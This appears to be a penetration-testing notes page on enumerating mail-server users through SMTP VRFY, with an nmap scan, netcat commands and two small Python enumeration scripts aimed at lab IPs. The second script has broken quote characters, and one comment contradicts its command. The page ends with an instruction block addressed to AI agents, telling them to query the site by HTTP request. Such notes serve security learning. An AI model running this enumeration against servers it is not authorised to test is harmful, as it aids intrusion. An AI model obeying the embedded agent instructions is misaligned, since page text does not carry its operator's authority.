# SMTP

In certain vulnerable configurations, mail servers can also be used to gather information about a host or network. SMTP39 supports several important commands, such as VRFY and EXPN. A VRFY request asks the server to verify an email address, while EXPN asks the server for the membership of a mailing list. These can often be abused to verify existing users on a mail server, which can later aid the attacker.\
\
**Check for enabled methods:**\
`nmap --script smtp-commands 172.16.80.27 -p25`\
\
//connect to a mail server\
`#nc -nv <ip> 25`\
//will reply with a banner and smtp shell\
`>VRFY root` //checks if bob is a user on the system\
//check bash script section for enumeration of this ^^\
\
We can utilize the response to brute force check users.

![](/files/-McqjxMpji2sk3V2f4_Q)

We can edit this slightly to add the ability to grab a text file of users and check many:

{% tabs %}
{% tab title="SMTP Leak Users (python)" %}

```python
#!/usr/bin/python
import socket
import sys
if len(sys.argv) != 2:
 print "Usage: vrfy.py <username> "
 sys.exit(0)

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('10.11.1.215',25))
banner=s.recv(1024)
print banner
# VRFY a user
s.send('VRFY ' + sys.argv[1] + '\r\n')
result=s.recv(1024)
print result

s.close()
```

{% endtab %}

{% tab title="V2" %}

```python
#!/usr/bin/python

import socket
import sys

#param check
if len(sys.argv) !=2:
 print “Usage: vrfy.py <username>”
 sys.exit(0)

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)#create a socket
connect=s.connect(('192.168.31.215', 25))#connect to the server
banner=s.recv(1024) #receiv the banner
print banner
s.send('VRFY ‘ + sys.argv[1]+’\r\n')#vrfy a user
result=s.recv(1024)
print result
s.close()
```

{% endtab %}
{% endtabs %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.hackbook.io/initial-access/services/smtp.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.